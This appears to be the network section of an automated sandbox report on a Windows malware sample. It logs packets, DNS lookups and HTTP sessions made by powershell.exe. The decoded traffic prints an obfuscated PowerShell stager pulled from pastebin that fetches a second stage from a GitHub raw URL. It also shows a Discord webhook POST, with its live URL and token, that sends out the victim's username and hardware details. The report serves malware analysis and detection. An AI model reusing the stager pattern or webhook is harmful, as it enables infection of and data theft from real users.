                                                                                                Oct 15, 2024 15:52:32.849473953 CEST49737443192.168.2.5185.199.108.133
                                                                                                Oct 15, 2024 15:52:32.849497080 CEST44349737185.199.108.133192.168.2.5
                                                                                                Oct 15, 2024 15:52:32.849766016 CEST44349737185.199.108.133192.168.2.5
                                                                                                Oct 15, 2024 15:52:32.852274895 CEST49737443192.168.2.5185.199.108.133
                                                                                                Oct 15, 2024 15:52:32.899410963 CEST44349737185.199.108.133192.168.2.5
                                                                                                Oct 15, 2024 15:52:32.979506969 CEST49736443192.168.2.5162.159.138.232
                                                                                                Oct 15, 2024 15:52:33.015826941 CEST44349737185.199.108.133192.168.2.5
                                                                                                Oct 15, 2024 15:52:33.015891075 CEST44349737185.199.108.133192.168.2.5
                                                                                                Oct 15, 2024 15:52:33.015922070 CEST44349737185.199.108.133192.168.2.5
                                                                                                Oct 15, 2024 15:52:33.015949965 CEST44349737185.199.108.133192.168.2.5
                                                                                                Oct 15, 2024 15:52:33.015985966 CEST49737443192.168.2.5185.199.108.133
                                                                                                Oct 15, 2024 15:52:33.016005993 CEST44349737185.199.108.133192.168.2.5
                                                                                                Oct 15, 2024 15:52:33.016032934 CEST49737443192.168.2.5185.199.108.133
                                                                                                Oct 15, 2024 15:52:33.017779112 CEST44349737185.199.108.133192.168.2.5
                                                                                                Oct 15, 2024 15:52:33.017832994 CEST49737443192.168.2.5185.199.108.133
                                                                                                Oct 15, 2024 15:52:33.017843008 CEST44349737185.199.108.133192.168.2.5
                                                                                                Oct 15, 2024 15:52:33.022345066 CEST44349737185.199.108.133192.168.2.5
                                                                                                Oct 15, 2024 15:52:33.022403955 CEST49737443192.168.2.5185.199.108.133
                                                                                                Oct 15, 2024 15:52:33.057761908 CEST49737443192.168.2.5185.199.108.133
                                                                                                Oct 15, 2024 15:52:35.893739939 CEST4975880192.168.2.5172.67.19.24
                                                                                                Oct 15, 2024 15:52:35.898721933 CEST8049758172.67.19.24192.168.2.5
                                                                                                Oct 15, 2024 15:52:35.898901939 CEST4975880192.168.2.5172.67.19.24
                                                                                                Oct 15, 2024 15:52:35.925517082 CEST4975880192.168.2.5172.67.19.24
                                                                                                Oct 15, 2024 15:52:35.930300951 CEST8049758172.67.19.24192.168.2.5
                                                                                                Oct 15, 2024 15:52:36.529638052 CEST8049758172.67.19.24192.168.2.5
                                                                                                Oct 15, 2024 15:52:36.583875895 CEST49764443192.168.2.5172.67.19.24
                                                                                                Oct 15, 2024 15:52:36.583924055 CEST44349764172.67.19.24192.168.2.5
                                                                                                Oct 15, 2024 15:52:36.584089041 CEST49764443192.168.2.5172.67.19.24
                                                                                                Oct 15, 2024 15:52:36.627341032 CEST49764443192.168.2.5172.67.19.24
                                                                                                Oct 15, 2024 15:52:36.627362013 CEST44349764172.67.19.24192.168.2.5
                                                                                                Oct 15, 2024 15:52:36.631073952 CEST4975880192.168.2.5172.67.19.24
                                                                                                Oct 15, 2024 15:52:37.277280092 CEST44349764172.67.19.24192.168.2.5
                                                                                                Oct 15, 2024 15:52:37.277355909 CEST49764443192.168.2.5172.67.19.24
                                                                                                Oct 15, 2024 15:52:37.280719995 CEST49764443192.168.2.5172.67.19.24
                                                                                                Oct 15, 2024 15:52:37.280730009 CEST44349764172.67.19.24192.168.2.5
                                                                                                Oct 15, 2024 15:52:37.280988932 CEST44349764172.67.19.24192.168.2.5
                                                                                                Oct 15, 2024 15:52:37.287086964 CEST49764443192.168.2.5172.67.19.24
                                                                                                Oct 15, 2024 15:52:37.331409931 CEST44349764172.67.19.24192.168.2.5
                                                                                                Oct 15, 2024 15:52:37.433320999 CEST44349764172.67.19.24192.168.2.5
                                                                                                Oct 15, 2024 15:52:37.433397055 CEST44349764172.67.19.24192.168.2.5
                                                                                                Oct 15, 2024 15:52:37.433470011 CEST49764443192.168.2.5172.67.19.24
                                                                                                Oct 15, 2024 15:52:37.445312977 CEST49764443192.168.2.5172.67.19.24
                                                                                                Oct 15, 2024 15:52:37.460151911 CEST4977080192.168.2.5185.199.108.133
                                                                                                Oct 15, 2024 15:52:37.465395927 CEST8049770185.199.108.133192.168.2.5
                                                                                                Oct 15, 2024 15:52:37.465465069 CEST4977080192.168.2.5185.199.108.133
                                                                                                Oct 15, 2024 15:52:37.465658903 CEST4977080192.168.2.5185.199.108.133
                                                                                                Oct 15, 2024 15:52:37.470927000 CEST8049770185.199.108.133192.168.2.5
                                                                                                Oct 15, 2024 15:52:38.059120893 CEST8049770185.199.108.133192.168.2.5
                                                                                                Oct 15, 2024 15:52:38.059351921 CEST4977080192.168.2.5185.199.108.133
                                                                                                Oct 15, 2024 15:52:38.060256004 CEST49771443192.168.2.5185.199.108.133
                                                                                                Oct 15, 2024 15:52:38.060290098 CEST44349771185.199.108.133192.168.2.5
                                                                                                Oct 15, 2024 15:52:38.060374975 CEST49771443192.168.2.5185.199.108.133
                                                                                                Oct 15, 2024 15:52:38.060626984 CEST49771443192.168.2.5185.199.108.133
                                                                                                Oct 15, 2024 15:52:38.060640097 CEST44349771185.199.108.133192.168.2.5
                                                                                                Oct 15, 2024 15:52:38.064965010 CEST8049770185.199.108.133192.168.2.5
                                                                                                Oct 15, 2024 15:52:38.065032005 CEST4977080192.168.2.5185.199.108.133
                                                                                                Oct 15, 2024 15:52:38.696314096 CEST44349771185.199.108.133192.168.2.5
                                                                                                Oct 15, 2024 15:52:38.696396112 CEST49771443192.168.2.5185.199.108.133
                                                                                                Oct 15, 2024 15:52:38.703533888 CEST49771443192.168.2.5185.199.108.133
                                                                                                Oct 15, 2024 15:52:38.703547001 CEST44349771185.199.108.133192.168.2.5
                                                                                                Oct 15, 2024 15:52:38.703789949 CEST44349771185.199.108.133192.168.2.5
                                                                                                Oct 15, 2024 15:52:38.705017090 CEST49771443192.168.2.5185.199.108.133
                                                                                                Oct 15, 2024 15:52:38.747407913 CEST44349771185.199.108.133192.168.2.5
                                                                                                Oct 15, 2024 15:52:38.831963062 CEST44349771185.199.108.133192.168.2.5
                                                                                                Oct 15, 2024 15:52:38.832026958 CEST44349771185.199.108.133192.168.2.5
                                                                                                Oct 15, 2024 15:52:38.832055092 CEST44349771185.199.108.133192.168.2.5
                                                                                                Oct 15, 2024 15:52:38.832140923 CEST49771443192.168.2.5185.199.108.133
                                                                                                Oct 15, 2024 15:52:38.832158089 CEST44349771185.199.108.133192.168.2.5
                                                                                                Oct 15, 2024 15:52:38.832257032 CEST49771443192.168.2.5185.199.108.133
                                                                                                Oct 15, 2024 15:52:38.832262039 CEST44349771185.199.108.133192.168.2.5
                                                                                                Oct 15, 2024 15:52:38.832283020 CEST44349771185.199.108.133192.168.2.5
                                                                                                Oct 15, 2024 15:52:38.832325935 CEST49771443192.168.2.5185.199.108.133
                                                                                                Oct 15, 2024 15:52:38.832329988 CEST44349771185.199.108.133192.168.2.5
                                                                                                Oct 15, 2024 15:52:38.834610939 CEST44349771185.199.108.133192.168.2.5
                                                                                                Oct 15, 2024 15:52:38.838176966 CEST49771443192.168.2.5185.199.108.133
                                                                                                Oct 15, 2024 15:52:38.898783922 CEST49771443192.168.2.5185.199.108.133
                                                                                                Oct 15, 2024 15:52:45.456079006 CEST49812443192.168.2.5162.159.138.232
                                                                                                Oct 15, 2024 15:52:45.456120968 CEST44349812162.159.138.232192.168.2.5
                                                                                                Oct 15, 2024 15:52:45.456233978 CEST49812443192.168.2.5162.159.138.232
                                                                                                Oct 15, 2024 15:52:45.456710100 CEST49812443192.168.2.5162.159.138.232
                                                                                                Oct 15, 2024 15:52:45.456723928 CEST44349812162.159.138.232192.168.2.5
                                                                                                Oct 15, 2024 15:52:46.071131945 CEST44349812162.159.138.232192.168.2.5
                                                                                                Oct 15, 2024 15:52:46.071234941 CEST49812443192.168.2.5162.159.138.232
                                                                                                Oct 15, 2024 15:52:46.072568893 CEST49812443192.168.2.5162.159.138.232
                                                                                                Oct 15, 2024 15:52:46.072577953 CEST44349812162.159.138.232192.168.2.5
                                                                                                Oct 15, 2024 15:52:46.072810888 CEST44349812162.159.138.232192.168.2.5
                                                                                                Oct 15, 2024 15:52:46.074095964 CEST49812443192.168.2.5162.159.138.232
                                                                                                Oct 15, 2024 15:52:46.115416050 CEST44349812162.159.138.232192.168.2.5
                                                                                                Oct 15, 2024 15:52:46.115528107 CEST49812443192.168.2.5162.159.138.232
                                                                                                Oct 15, 2024 15:52:46.115541935 CEST44349812162.159.138.232192.168.2.5
                                                                                                Oct 15, 2024 15:52:46.406821012 CEST44349812162.159.138.232192.168.2.5
                                                                                                Oct 15, 2024 15:52:46.406924009 CEST44349812162.159.138.232192.168.2.5
                                                                                                Oct 15, 2024 15:52:46.406975031 CEST49812443192.168.2.5162.159.138.232
                                                                                                Oct 15, 2024 15:52:46.416421890 CEST49812443192.168.2.5162.159.138.232
                                                                                                Oct 15, 2024 15:52:51.294828892 CEST49847443192.168.2.5162.159.138.232
                                                                                                Oct 15, 2024 15:52:51.294912100 CEST44349847162.159.138.232192.168.2.5
                                                                                                Oct 15, 2024 15:52:51.295053005 CEST49847443192.168.2.5162.159.138.232
                                                                                                Oct 15, 2024 15:52:51.295561075 CEST49847443192.168.2.5162.159.138.232
                                                                                                Oct 15, 2024 15:52:51.295597076 CEST44349847162.159.138.232192.168.2.5
                                                                                                Oct 15, 2024 15:52:51.459484100 CEST4971880192.168.2.5172.67.19.24
                                                                                                Oct 15, 2024 15:52:51.899722099 CEST44349847162.159.138.232192.168.2.5
                                                                                                Oct 15, 2024 15:52:51.899832010 CEST49847443192.168.2.5162.159.138.232
                                                                                                Oct 15, 2024 15:52:51.901669025 CEST49847443192.168.2.5162.159.138.232
                                                                                                Oct 15, 2024 15:52:51.901696920 CEST44349847162.159.138.232192.168.2.5
                                                                                                Oct 15, 2024 15:52:51.901947975 CEST44349847162.159.138.232192.168.2.5
                                                                                                Oct 15, 2024 15:52:51.902903080 CEST49847443192.168.2.5162.159.138.232
                                                                                                Oct 15, 2024 15:52:51.947446108 CEST44349847162.159.138.232192.168.2.5
                                                                                                Oct 15, 2024 15:52:51.947550058 CEST49847443192.168.2.5162.159.138.232
                                                                                                Oct 15, 2024 15:52:51.947573900 CEST44349847162.159.138.232192.168.2.5
                                                                                                Oct 15, 2024 15:52:52.200553894 CEST44349847162.159.138.232192.168.2.5
                                                                                                Oct 15, 2024 15:52:52.200714111 CEST44349847162.159.138.232192.168.2.5
                                                                                                Oct 15, 2024 15:52:52.200813055 CEST49847443192.168.2.5162.159.138.232
                                                                                                Oct 15, 2024 15:52:52.216428995 CEST49847443192.168.2.5162.159.138.232
                                                                                                Oct 15, 2024 15:52:57.227303028 CEST4975880192.168.2.5172.67.19.24

                                                                                                UDP Packets

                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                Oct 15, 2024 15:52:28.630584955 CEST4964653192.168.2.51.1.1.1
                                                                                                Oct 15, 2024 15:52:28.638366938 CEST53496461.1.1.1192.168.2.5
                                                                                                Oct 15, 2024 15:52:31.375305891 CEST6275553192.168.2.51.1.1.1
                                                                                                Oct 15, 2024 15:52:31.382807016 CEST53627551.1.1.1192.168.2.5
                                                                                                Oct 15, 2024 15:52:31.567023039 CEST5317853192.168.2.51.1.1.1
                                                                                                Oct 15, 2024 15:52:31.574409962 CEST53531781.1.1.1192.168.2.5

                                                                                                DNS Queries

                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                Oct 15, 2024 15:52:28.630584955 CEST192.168.2.51.1.1.10xf11Standard query (0)pastebin.comA (IP address)IN (0x0001)false
                                                                                                Oct 15, 2024 15:52:31.375305891 CEST192.168.2.51.1.1.10xe582Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                                                                Oct 15, 2024 15:52:31.567023039 CEST192.168.2.51.1.1.10x1e5bStandard query (0)discord.comA (IP address)IN (0x0001)false

                                                                                                DNS Answers

                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                Oct 15, 2024 15:52:28.638366938 CEST1.1.1.1192.168.2.50xf11No error (0)pastebin.com172.67.19.24A (IP address)IN (0x0001)false
                                                                                                Oct 15, 2024 15:52:28.638366938 CEST1.1.1.1192.168.2.50xf11No error (0)pastebin.com104.20.3.235A (IP address)IN (0x0001)false
                                                                                                Oct 15, 2024 15:52:28.638366938 CEST1.1.1.1192.168.2.50xf11No error (0)pastebin.com104.20.4.235A (IP address)IN (0x0001)false
                                                                                                Oct 15, 2024 15:52:31.382807016 CEST1.1.1.1192.168.2.50xe582No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                                                Oct 15, 2024 15:52:31.382807016 CEST1.1.1.1192.168.2.50xe582No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                                                Oct 15, 2024 15:52:31.382807016 CEST1.1.1.1192.168.2.50xe582No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                                                Oct 15, 2024 15:52:31.382807016 CEST1.1.1.1192.168.2.50xe582No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                                                Oct 15, 2024 15:52:31.574409962 CEST1.1.1.1192.168.2.50x1e5bNo error (0)discord.com162.159.138.232A (IP address)IN (0x0001)false
                                                                                                Oct 15, 2024 15:52:31.574409962 CEST1.1.1.1192.168.2.50x1e5bNo error (0)discord.com162.159.128.233A (IP address)IN (0x0001)false
                                                                                                Oct 15, 2024 15:52:31.574409962 CEST1.1.1.1192.168.2.50x1e5bNo error (0)discord.com162.159.135.232A (IP address)IN (0x0001)false
                                                                                                Oct 15, 2024 15:52:31.574409962 CEST1.1.1.1192.168.2.50x1e5bNo error (0)discord.com162.159.136.232A (IP address)IN (0x0001)false
                                                                                                Oct 15, 2024 15:52:31.574409962 CEST1.1.1.1192.168.2.50x1e5bNo error (0)discord.com162.159.137.232A (IP address)IN (0x0001)false

                                                                                                HTTP Request Dependency Graph

                                                                                                • pastebin.com
                                                                                                • discord.com
                                                                                                • raw.githubusercontent.com

                                                                                                HTTP Packets

                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                0192.168.2.549718172.67.19.24805424C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 15, 2024 15:52:28.760510921 CEST169OUTGET /raw/sA04Mwk2 HTTP/1.1
                                                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                Host: pastebin.com
                                                                                                Connection: Keep-Alive
                                                                                                Oct 15, 2024 15:52:29.379018068 CEST472INHTTP/1.1 301 Moved Permanently
                                                                                                Date: Tue, 15 Oct 2024 13:52:29 GMT
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 167
                                                                                                Connection: keep-alive
                                                                                                Cache-Control: max-age=3600
                                                                                                Expires: Tue, 15 Oct 2024 14:52:29 GMT
                                                                                                Location: https://pastebin.com/raw/sA04Mwk2
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8d304a372d6946c8-DFW
                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                1192.168.2.549735185.199.108.133805424C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 15, 2024 15:52:31.391556025 CEST222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                Host: raw.githubusercontent.com
                                                                                                Connection: Keep-Alive
                                                                                                Oct 15, 2024 15:52:32.227159977 CEST541INHTTP/1.1 301 Moved Permanently
                                                                                                Connection: close
                                                                                                Content-Length: 0
                                                                                                Server: Varnish
                                                                                                Retry-After: 0
                                                                                                Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                Accept-Ranges: bytes
                                                                                                Date: Tue, 15 Oct 2024 13:52:31 GMT
                                                                                                Via: 1.1 varnish
                                                                                                X-Served-By: cache-dfw-kdal2120139-DFW
                                                                                                X-Cache: HIT
                                                                                                X-Cache-Hits: 0
                                                                                                X-Timer: S1729000352.920989,VS0,VE0
                                                                                                Access-Control-Allow-Origin: *
                                                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                                                Expires: Tue, 15 Oct 2024 13:57:31 GMT
                                                                                                Vary: Authorization,Accept-Encoding
                                                                                                Oct 15, 2024 15:52:32.228888035 CEST541INHTTP/1.1 301 Moved Permanently
                                                                                                Connection: close
                                                                                                Content-Length: 0
                                                                                                Server: Varnish
                                                                                                Retry-After: 0
                                                                                                Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                Accept-Ranges: bytes
                                                                                                Date: Tue, 15 Oct 2024 13:52:31 GMT
                                                                                                Via: 1.1 varnish
                                                                                                X-Served-By: cache-dfw-kdal2120139-DFW
                                                                                                X-Cache: HIT
                                                                                                X-Cache-Hits: 0
                                                                                                X-Timer: S1729000352.920989,VS0,VE0
                                                                                                Access-Control-Allow-Origin: *
                                                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                                                Expires: Tue, 15 Oct 2024 13:57:31 GMT
                                                                                                Vary: Authorization,Accept-Encoding


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                2192.168.2.549758172.67.19.24801196C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 15, 2024 15:52:35.925517082 CEST169OUTGET /raw/sA04Mwk2 HTTP/1.1
                                                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                Host: pastebin.com
                                                                                                Connection: Keep-Alive
                                                                                                Oct 15, 2024 15:52:36.529638052 CEST472INHTTP/1.1 301 Moved Permanently
                                                                                                Date: Tue, 15 Oct 2024 13:52:36 GMT
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 167
                                                                                                Connection: keep-alive
                                                                                                Cache-Control: max-age=3600
                                                                                                Expires: Tue, 15 Oct 2024 14:52:36 GMT
                                                                                                Location: https://pastebin.com/raw/sA04Mwk2
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8d304a63dd3a6b64-DFW
                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                3192.168.2.549770185.199.108.133801196C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 15, 2024 15:52:37.465658903 CEST222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                Host: raw.githubusercontent.com
                                                                                                Connection: Keep-Alive
                                                                                                Oct 15, 2024 15:52:38.059120893 CEST541INHTTP/1.1 301 Moved Permanently
                                                                                                Connection: close
                                                                                                Content-Length: 0
                                                                                                Server: Varnish
                                                                                                Retry-After: 0
                                                                                                Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                Accept-Ranges: bytes
                                                                                                Date: Tue, 15 Oct 2024 13:52:37 GMT
                                                                                                Via: 1.1 varnish
                                                                                                X-Served-By: cache-dfw-kdal2120059-DFW
                                                                                                X-Cache: HIT
                                                                                                X-Cache-Hits: 0
                                                                                                X-Timer: S1729000358.991880,VS0,VE0
                                                                                                Access-Control-Allow-Origin: *
                                                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                                                Expires: Tue, 15 Oct 2024 13:57:37 GMT
                                                                                                Vary: Authorization,Accept-Encoding


                                                                                                HTTPS Proxied Packets

                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                0192.168.2.549724172.67.19.244435424C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-10-15 13:52:30 UTC169OUTGET /raw/sA04Mwk2 HTTP/1.1
                                                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                Host: pastebin.com
                                                                                                Connection: Keep-Alive
                                                                                                2024-10-15 13:52:30 UTC391INHTTP/1.1 200 OK
                                                                                                Date: Tue, 15 Oct 2024 13:52:30 GMT
                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                x-frame-options: DENY
                                                                                                x-content-type-options: nosniff
                                                                                                x-xss-protection: 1;mode=block
                                                                                                cache-control: public, max-age=1801
                                                                                                CF-Cache-Status: EXPIRED
                                                                                                Last-Modified: Tue, 15 Oct 2024 13:52:30 GMT
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8d304a3ce9aa83a7-DFW
                                                                                                2024-10-15 13:52:30 UTC139INData Raw: 38 35 0d 0a 63 61 6c 6c 69 54 28 57 49 4e 44 4f 57 53 5f 4e 54 20 28 22 72 61 77 2e 67 69 22 2b 22 74 68 75 62 22 2b 22 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 22 2b 22 6f 6d 2f 4e 65 22 2b 22 74 68 33 4e 2f 6e 61 39 6f 77 33 34 39 35 72 61 79 67 77 69 34 22 2b 22 67 79 72 68 75 61 77 65 72 61 77 65 72 61 2f 6d 61 69 6e 2f 67 61 62 65 72 2e 74 78 74 22 29 20 2d 75 73 65 62 61 73 69 63 70 61 72 73 69 6e 67 29 0d 0a
                                                                                                Data Ascii: 85calliT(WINDOWS_NT ("raw.gi"+"thub"+"usercontent.c"+"om/Ne"+"th3N/na9ow3495raygwi4"+"gyrhuawerawera/main/gaber.txt") -usebasicparsing)
                                                                                                2024-10-15 13:52:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                1192.168.2.549736162.159.138.2324434144C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-10-15 13:52:32 UTC333OUTPOST /api/webhooks/1295171900019966004/KRGDAVzqdqMZILdh_WVWyqLwT2_aVjXOXnoEnaoZ5xZY_kNOmMNm2yrdQTKMOzXSXWSI HTTP/1.1
                                                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                Content-Type: application/json
                                                                                                Host: discord.com
                                                                                                Content-Length: 215
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                2024-10-15 13:52:32 UTC25INHTTP/1.1 100 Continue
                                                                                                2024-10-15 13:52:32 UTC215OUTData Raw: 7b 0d 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 22 3a 20 20 22 2a 2a 61 6c 66 6f 6e 73 2a 2a 20 68 61 73 20 6a 6f 69 6e 65 64 20 2d 20 73 74 6d 5c 6e 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 5c 6e 2a 2a 47 50 55 3a 2a 2a 20 53 5f 37 44 43 38 42 47 48 5c 6e 2a 2a 43 50 55 3a 2a 2a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 5c 6e 2a 2a 43 50 55 20 43 6f 72 65 73 3a 2a 2a 20 34 20 34 22 0d 0a 7d
                                                                                                Data Ascii: { "content": "**user** has joined - stm\n----------------------------------\n**GPU:** S_7DC8BGH\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4"}
                                                                                                2024-10-15 13:52:32 UTC1369INHTTP/1.1 204 No Content
                                                                                                Date: Tue, 15 Oct 2024 13:52:32 GMT
                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                Connection: close
                                                                                                set-cookie: __dcfduid=b9e09af28afc11ef95f3aa43d37be0b6; Expires=Sun, 14-Oct-2029 13:52:32 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                x-ratelimit-limit: 5
                                                                                                x-ratelimit-remaining: 4
                                                                                                x-ratelimit-reset: 1729000353
                                                                                                x-ratelimit-reset-after: 1
                                                                                                via: 1.1 google
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RKNmme11s6gH6HRfzfQk1N1sxzEy0dIdIOUI4BX37NQSwAZgwHD94dw8SlPKEut7yEkIJETvWRkYXFnCDq3gKwsuawDdZvq84pMyKzRE8Fj6O%2BrtPLWx1eEEz7Bo"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                X-Content-Type-Options: nosniff
                                                                                                Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                Set-Cookie: __sdcfduid=b9e09af28afc11ef95f3aa43d37be0b632c4310aebb59ffb4a8cba278716ebac1099bfccecaef7381f5655e3ec6f1ed8; Expires=Sun, 14-Oct-2029 13:52:32 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                Set-Cookie: __cfruid=f7e8703d1d6b6e39dfe06078b858bed921a723bf-1729000352; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                Set-Cookie: _cfuvid
                                                                                                2024-10-15 13:52:32 UTC192INData Raw: 3d 68 75 6f 70 4c 48 59 64 6d 4f 41 58 65 75 5f 48 68 6b 75 43 74 59 2e 79 4b 5f 7a 4a 77 75 2e 54 54 59 56 64 61 4f 59 4e 4d 7a 67 2d 31 37 32 39 30 30 30 33 35 32 36 38 37 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 64 33 30 34 61 34 61 30 63 30 62 32 65 36 61 2d 44 46 57 0d 0a 0d 0a
                                                                                                Data Ascii: =huopLHYdmOAXeu_HhkuCtY.yK_zJwu.TTYVdaOYNMzg-1729000352687-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8d304a4a0c0b2e6a-DFW


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                2192.168.2.549737185.199.108.1334435424C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                TimestampBytes transferredDirectionData
